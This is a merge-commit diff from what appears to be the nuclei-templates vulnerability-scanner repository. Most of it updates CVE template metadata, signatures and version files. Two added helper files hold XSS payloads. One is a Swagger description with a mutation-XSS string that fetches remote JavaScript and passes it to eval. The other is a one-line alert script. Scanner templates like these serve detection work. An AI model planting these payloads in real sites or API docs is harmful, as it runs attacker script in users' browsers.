Merge branch 'main' into structurizr-panel
commit
d1f8b1f711
|
@ -3,8 +3,10 @@ http/cves/2021/CVE-2021-33690.yaml
|
|||
http/cves/2021/CVE-2021-35395.yaml
|
||||
http/cves/2021/CVE-2021-45382.yaml
|
||||
http/cves/2022/CVE-2022-1170.yaml
|
||||
http/cves/2023/CVE-2023-39796.yaml
|
||||
http/cves/2023/CVE-2023-47246.yaml
|
||||
http/cves/2023/CVE-2023-5375.yaml
|
||||
http/default-logins/structurizr/structurizr-default-login.yaml
|
||||
http/exposed-panels/adhoc-transfer-panel.yaml
|
||||
http/exposures/configs/jsconfig-json.yaml
|
||||
http/exposures/configs/phinx-config.yaml
|
||||
|
|
|
@ -28,3 +28,4 @@ files:
|
|||
- http/cves/2020/CVE-2020-2036.yaml
|
||||
- http/cves/2020/CVE-2020-28351.yaml
|
||||
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||
- http/cves/2021/CVE-2021-28164.yaml
|
||||
|
|
|
@ -2166,6 +2166,7 @@
|
|||
{"ID":"CVE-2023-39676","Info":{"Name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","Severity":"medium","Description":"Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39676.yaml"}
|
||||
{"ID":"CVE-2023-39677","Info":{"Name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","Severity":"high","Description":"PrestaShop modules by MyPrestaModules expose PHPInfo\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39677.yaml"}
|
||||
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
|
||||
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
|
||||
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
|
||||
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
|
||||
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
|
||||
|
|
|
@ -1 +1 @@
|
|||
680c50ce87e3dee569642227b357ac3a
|
||||
22026e9ccc6e3ddfe78f0568ab6e571a
|
||||
|
|
|
@ -0,0 +1 @@
|
|||
alert(window.origin);
|
|
@ -0,0 +1,12 @@
|
|||
swagger: '2.0'
|
||||
info:
|
||||
title: Classic API Resource Documentation
|
||||
description: <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/CVE-2018-25031.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>">"</textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
|
||||
version: production
|
||||
basePath: /JSSResource/
|
||||
produces:
|
||||
- application/xml
|
||||
- application/json
|
||||
consumes:
|
||||
- application/xml
|
||||
- application/json
|
|
@ -1 +1 @@
|
|||
4.0.1
|
||||
4.0.2
|
|
@ -1 +1 @@
|
|||
5.8.16
|
||||
5.8.18
|
|
@ -1 +1 @@
|
|||
3.1.3
|
||||
3.1.4
|
|
@ -1 +1 @@
|
|||
5.1.2
|
||||
5.1.4
|
|
@ -1 +1 @@
|
|||
2.5.11
|
||||
2.5.12
|
|
@ -1 +1 @@
|
|||
1.113.0
|
||||
1.114.0
|
|
@ -1 +1 @@
|
|||
3.0.4
|
||||
3.0.5
|
|
@ -1 +1 @@
|
|||
17.0.2
|
||||
17.1.1
|
|
@ -1 +1 @@
|
|||
1.8.3
|
||||
1.9.1
|
|
@ -1 +1 @@
|
|||
10.2.13
|
||||
10.2.16
|
|
@ -1 +1 @@
|
|||
1.8.1
|
||||
1.8.2
|
|
@ -1 +1 @@
|
|||
4.9.9
|
||||
4.9.10
|
|
@ -1 +1 @@
|
|||
4.36.0
|
||||
4.37.0
|
|
@ -1 +1 @@
|
|||
5.8.2
|
||||
5.9.0
|
|
@ -1 +1 @@
|
|||
2.6.5
|
||||
2.6.5.1
|
|
@ -1 +1 @@
|
|||
2.8.3
|
||||
2.8.4
|
|
@ -1 +1 @@
|
|||
4.10.14
|
||||
4.10.15
|
|
@ -1 +1 @@
|
|||
2.2.1
|
||||
2.2.2
|
|
@ -1 +1 @@
|
|||
7.4.3
|
||||
7.4.4
|
|
@ -1 +1 @@
|
|||
1.4.7
|
||||
1.4.8
|
|
@ -1 +1 @@
|
|||
6.2.8
|
||||
6.2.8.1
|
|
@ -1 +1 @@
|
|||
8.3.0
|
||||
8.3.1
|
|
@ -1 +1 @@
|
|||
3.2.21
|
||||
3.2.22
|
|
@ -1 +1 @@
|
|||
11.0.1
|
||||
11.0.2
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2000-0114
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.09258
|
||||
epss-percentile: 0.94061
|
||||
epss-percentile: 0.94064
|
||||
cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a00463044022048ce8faa54093730afea139ffa9e0f919c743dc66f01f4eb45e415c4cb29d35f02202b7e664a628ff01b7169674bff8aa34984fe13ac20b7ef99bd8ab5576bfdd39b:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502202e36acb8c6d9454d8bff03116851e6adde3de225588d975f7a0c55d21cac22b3022100a2907c453fb03d21b073267ca2e74b195d49228ec1d26c141b5b99404cfe6ae1:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2001-0537
|
||||
cwe-id: CWE-287
|
||||
epss-score: 0.88063
|
||||
epss-percentile: 0.98369
|
||||
epss-percentile: 0.9837
|
||||
cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -48,4 +48,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a0048304602210098c0f19970ae7f445d8e82a262c8a75ec8a0723218a8dbb51cfa883cf9b247e3022100f942c77e8aa734f415df8de5d1eaab76720ce274444f5dc2b2c3e6a45392434e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022047be537c9923fe27965f854d2acda5523a73f0a9818d6b88bec59138a7cf42f20220277064185fe17be0212f64d909e0aad8bf435ee0f1bf4be09a205dfe4c287662:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2002-1131
|
||||
cwe-id: CWE-80
|
||||
epss-score: 0.06018
|
||||
epss-percentile: 0.92702
|
||||
epss-percentile: 0.92707
|
||||
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 5
|
||||
|
@ -54,4 +54,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100b97a2a41c390c5c2b27a9c234ac1df5e86c885d3265361f73c739ac8f1f40997022100a495e27ad15617b33955de0987ddaa1e919119d26baf4233cd667fbcd4b04414:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ec4b587bec2270bce8c82127eb66e391ba33fd00932e4862400f1154b9303bde022036c42f43a0401ff3f7c712721d4b1db3113db62d8f61a5a063d19bee6024e72b:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2004-0519
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.02285
|
||||
epss-percentile: 0.88463
|
||||
epss-percentile: 0.88466
|
||||
cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -47,4 +47,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502203b96777d4b3bde3cccf53a6141fc2f278e40b97d4d57b2cae956313718196122022100f18fa07c34f43dc4bcfc6056f90fefe68a5081c894e60bad89efe02b8e710da8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100c301cc7b550fde363eee15974197c1fdc4128657b5d995afa1ea9134d8dcbcf8022100ccb5755fbf07162a8db79ddc57487855882cb297746291e15be5e043c572963d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2004-1965
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.0113
|
||||
epss-percentile: 0.83036
|
||||
epss-percentile: 0.83041
|
||||
cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -38,4 +38,4 @@ http:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
|
||||
|
||||
# digest: 4a0a00473045022100dcf18300d50c497b993f8a10eaca784faa78cbb27f13751b95930340678a7cbf022019bdd134729bf9fe6b997608181d4a797cff128b052a9e3b8e4c7c48dc89c9a9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b35967bb561ff5810277b96227e37d8454e14b1677e425c9de5698b3d1574e9a02205c8959cca45a5bf597eb354706d147b1780030a1a2d4d0f9c449b5012d99527d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2005-2428
|
||||
cwe-id: CWE-200
|
||||
epss-score: 0.01188
|
||||
epss-percentile: 0.83512
|
||||
epss-percentile: 0.83516
|
||||
cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -43,4 +43,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a00463044022069e4a6fccee8c942522351f126595e0615bf4e74c91662176df0ecd2093c7b2b02203b43ce147b12c05c69672adf41e223c1e20958dbfbb154bec2dce003cd7624cd:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100a2d5f72dcd0f626ae6f32bd540a12703e7dbc5957f6eace6ba09e16fe270fe71022047555ee3e2d7e149a5e15f801ee5782e384945db6a410516119698c5310f5fde:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2005-3344
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.02158
|
||||
epss-percentile: 0.88106
|
||||
epss-percentile: 0.88108
|
||||
cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
@ -46,4 +46,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a00463044022025b2595121d849e928945002557cb33b806a936f0f528dbf232630e2957c1f660220621043e4d04288806c6a5efdf8793ac560c719fc07c82803be7014c190c21233:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f790903144442d434228abab4315abc7a333cbe71f5683f5083eb68deeb8b946022100b8c43787fb1f0307de2bd31b4e175284d8a3c87375b4b9ba6ebf693d65b490c5:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -21,7 +21,7 @@ info:
|
|||
cve-id: CVE-2005-3634
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.02843
|
||||
epss-percentile: 0.89622
|
||||
epss-percentile: 0.89618
|
||||
cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
|
||||
|
||||
# digest: 490a004630440220320a3bda23ea45e94f7c685efab15cae18542b5cbda24af451d5ef9cb97ddf420220265bd35c932f16b27afec8cc465bbebdf0dd83f49a0d10fd5664dbc170cdb0fe:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502200f40b34464a0f1e3d6001e52aa69e74c2c48a2017fff5b77e77555ce71b44fc1022100af6d74735593974c2c7e6b06f96cab9c040bc6c8565d39994d19c02e6b0abb6e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2005-4385
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.00294
|
||||
epss-percentile: 0.65856
|
||||
epss-percentile: 0.65861
|
||||
cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a004730450220336e180d5ba2e4b3c738c1bf784563883acf4b2c69b821a5b6d8ef3f821c15d50221009dfa52c525b627dfd0abaee07de8789206d8811e5534c4d767bdb7b775fcc025:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100e3cd4b5bb9ebb5853939e45defaf4db6ac8feb453eb357d381ca95fd87963638022100fc6da91c808ad8148b24cd06c5ab4fd37fd44ac18ff072685cdd56efdf4c81ff:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2006-1681
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.01015
|
||||
epss-percentile: 0.82052
|
||||
epss-percentile: 0.82058
|
||||
cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -46,4 +46,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a00463044022069dd03a6917eeb2528b42c3420defc15c3f2a5b9bdac86532232ed0e4fe061e9022010b886ace8b2c788d35fcb07b015ce4052af66bc1d982eba6159043ceed982ba:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502203706ad6b458a92ce93c16b3aba9b966677c0199ab0e83c5f98858f62508b3114022100b2bf954a4361e544006283ac785fc3395e2fb56fc987ac849df4b16f9c60dc3b:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2006-2842
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.17301
|
||||
epss-percentile: 0.95573
|
||||
epss-percentile: 0.95572
|
||||
cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -42,4 +42,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100cb0816cb3fe79d97f0228055a2b47f4aa44626b54862178f3cdbc81089f44cec022100ece7404f247093e3d47821e1fcabb81b4dbd702e96a6a8aa3e9b3af8e8831432:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100e3582bfdcc59e3db1c7783ee544b0841c5a0ad9504711fa1381fd0d1666ce748022100d97389199355bc16f4c0b38bcfe496edceb700dc536149e0266aaddb4a1bf0bc:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2007-0885
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.00827
|
||||
epss-percentile: 0.80005
|
||||
epss-percentile: 0.80014
|
||||
cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -44,4 +44,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502210092f5a89a42058c7af87a73723578c985984b3b81f0d2d8544039e55229b4f7cc02206ca43653b277dea138a7cb8d0895b442373a75f580b33df955c7b5b38a48781b:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100d3829f46d555ccf841d372cde3cdd4347dcc5d7fd520b3ed0e3209b29073062e02203e9ec3cceb2f4dd7e262d82e96a5969ecc305871edff4f7ef108556924396bc3:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2007-4504
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01677
|
||||
epss-percentile: 0.86257
|
||||
epss-percentile: 0.86265
|
||||
cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100f8da016370975d94cbb0a33acde8ccfd07970c70634d298f18d7d6862896050402200ca2e0c4b5dd1913c037dcb9cb73ef39de9cae06c1df7cfc27d44ba7490791f0:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402202f8ca910b1f4107cb5bd505afd7f397d841289dbc46c48278f7f7f0c2d646a580220645a857d5cba68caeb6c5e98e1a7b5be3e472a9a92db5a7eed6416b63f38ea25:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -20,7 +20,7 @@ info:
|
|||
cve-id: CVE-2007-4556
|
||||
cwe-id: NVD-CWE-Other
|
||||
epss-score: 0.19583
|
||||
epss-percentile: 0.95793
|
||||
epss-percentile: 0.95794
|
||||
cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -50,4 +50,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502205092c8bd41d52dfccd06f003074e351f47cf060187a5e77faca7af5d2b8c8cc1022100f1e9bd82ca5988484c6c87f7386b0deec61488aaedb24cfd5e631d92265539d5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200850fc7ed1b91307b3a23998e8628a66095316659cc477e12a1c97188b55836d02203b337a87d22a6faf25b112ac876d308fe6d26d9f99cc3761034e5b1ff203bdef:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2007-5728
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.02361
|
||||
epss-percentile: 0.88645
|
||||
epss-percentile: 0.88644
|
||||
cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -51,4 +51,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100c111e6b1b572fb60658c5a22b0332b785e824652909cca400d890f3816572bf0022017e97d5c08c2f5c64da41077e82a0a33c5df8c16d54c74bd18bfebc8e6815767:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402204f803c0b9a32f10e8c25a84fa6b253a513b0d85a7f2d953f90bdb8927d691e9502202ecffdaba217e233508113e43104f5cf6a753f85bb44144019712e18b779bb12:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -20,7 +20,7 @@ info:
|
|||
cve-id: CVE-2008-1059
|
||||
cwe-id: CWE-94
|
||||
epss-score: 0.01493
|
||||
epss-percentile: 0.85392
|
||||
epss-percentile: 0.85397
|
||||
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -46,4 +46,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100e5eddc892b72bdc28577251278e1adda2910c32ca45e84e3f9564396b2ad32d202200101924763ec4906d1a5081515b8bc0fca925d9f46bfc42448dce6d05c0cb009:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220684efbd0dcfb1e302eec93d8d6ff8860639f3c126888fd75e68316b06436ab54022100d3088d0c3dabba14fc406349a77ee71d0ddeaf7add2219c6dc6a4e3409aa8e3a:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -20,7 +20,7 @@ info:
|
|||
cve-id: CVE-2008-1061
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00938
|
||||
epss-percentile: 0.81295
|
||||
epss-percentile: 0.81303
|
||||
cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -49,4 +49,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502202c61e42b5a7e4dfaa93f6817265f4a028e5bb352b80d3b003b8ff1934b91997d022100c6ad1c3618bb7587c45e4a38128db182daeb2f336942dae1ffcf1926844fe2d8:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200402dfc70fc9d7669204fbd77318d3749be0eb328605e7b499e39ee0f4e5280202203940b3c771ffe2ee5585caaa99ae6d87cf8e3aa0b1888d7eec9ffc2062981aed:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2008-1547
|
||||
cwe-id: CWE-601
|
||||
epss-score: 0.02834
|
||||
epss-percentile: 0.89607
|
||||
epss-percentile: 0.89603
|
||||
cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||
|
||||
# digest: 4b0a004830460221008b0d2c3f3227811515138469de01725a23c914b91298f951d795a50ef813f3fe02210082968eafc5dd0fa47125748a2e77ffb154613c62ab8b084845dfa24ef03ac7cc:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220232c69bd8ce674b741f635073c308110014f65b9bcf8c8cb5d4111175000a86d022100aef0433d8a7b089017134050a69f084a70eb3941d1ae5918517e57e2c2911e6e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2008-2398
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00329
|
||||
epss-percentile: 0.67773
|
||||
epss-percentile: 0.67784
|
||||
cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -46,4 +46,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502207db60f14a91f1c1e8c3b2f471cc6cff6987cb6226de579da6d67f1858a6c862a022100a1d2d520fcba0f02094cb91aa96d363ce039584f693be1372ee865a59499ad87:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100d4d3bf2c3d0b360123f15a56619c84cb54c4533b589fcae92f457a2cbb156652022059c74e6af3f2fc080369b3ad9012f277485cce6446956b845921ddf33eabe46f:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -20,7 +20,7 @@ info:
|
|||
cve-id: CVE-2008-2650
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.06344
|
||||
epss-percentile: 0.92894
|
||||
epss-percentile: 0.92897
|
||||
cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -46,4 +46,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a0046304402200b697aaefab407b21717a5bdc4cce7a6a1aceaaeb04a3940718c97c83ef8ba98022049f6a7c43d9dcdc8008c632db0c4a07b53521c733d93b0f5c6c4c242930b4bb5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220446149fd72e585eb31d62b7e0c8cf8cf813de946550ebcea5f5f73add945fdaf022100955aa846428dab6271841bab335d4c3491257b39194988f8db4eae1639362a82:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
cve-id: CVE-2008-4668
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01018
|
||||
epss-percentile: 0.82074
|
||||
epss-percentile: 0.82079
|
||||
cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022048d2a4f402c23e9cef97d16a4b453d399bc0b4086125ba6987359c20564865d1022100c1cfd6c53b6f5411f254666da76c7880daa05630f83acb0a94104ac8a7589095:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100e9d3a150a1f0aa5f97ed5e52a2366008fae31b92cdbe818dbc3cbc6b20e4e0b7022015c211e15aaf5d8551d2d35dbcab01ecb56e25ded67c3b83328024d97bfba309:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2008-4764
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.02365
|
||||
epss-percentile: 0.8865
|
||||
epss-percentile: 0.88649
|
||||
cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a004830460221009120c1a8c2d3e9e351c0f35e42fa22e3922e0c5ce623006cfb3b0e08f711ddcd022100bb22a7c04a2a95aee529cea4307258b783084e284f05835f47a12fffc2b6192c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022030d2167546fbd476ecf4b936827de52a50ae91c35e99fbb63d9a69f2e4fa72c3022100d93ff87b171861e3ad27937420695925e3401e9c765edea4c1b7d1c9a62800fd:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
cve-id: CVE-2008-5587
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.02331
|
||||
epss-percentile: 0.88566
|
||||
epss-percentile: 0.88567
|
||||
cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -43,4 +43,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100aaded62231a5141184f5b162e3e5c6efb13d3041868ebc2242a9dafa4281ac4602207158dc275243b8885290f2d55ef06f08be99e314aba7e20cc7c516c32cad805b:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402206b848d4e0558949cf511f534f032bfee1051e89de0c29c3563b502dcbe19878f022025eb531dde9bd20eee88d95210f28f858f9e44b60d6200cf179e7cab5a2f4e92:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2008-6080
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00824
|
||||
epss-percentile: 0.79969
|
||||
epss-percentile: 0.79978
|
||||
cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
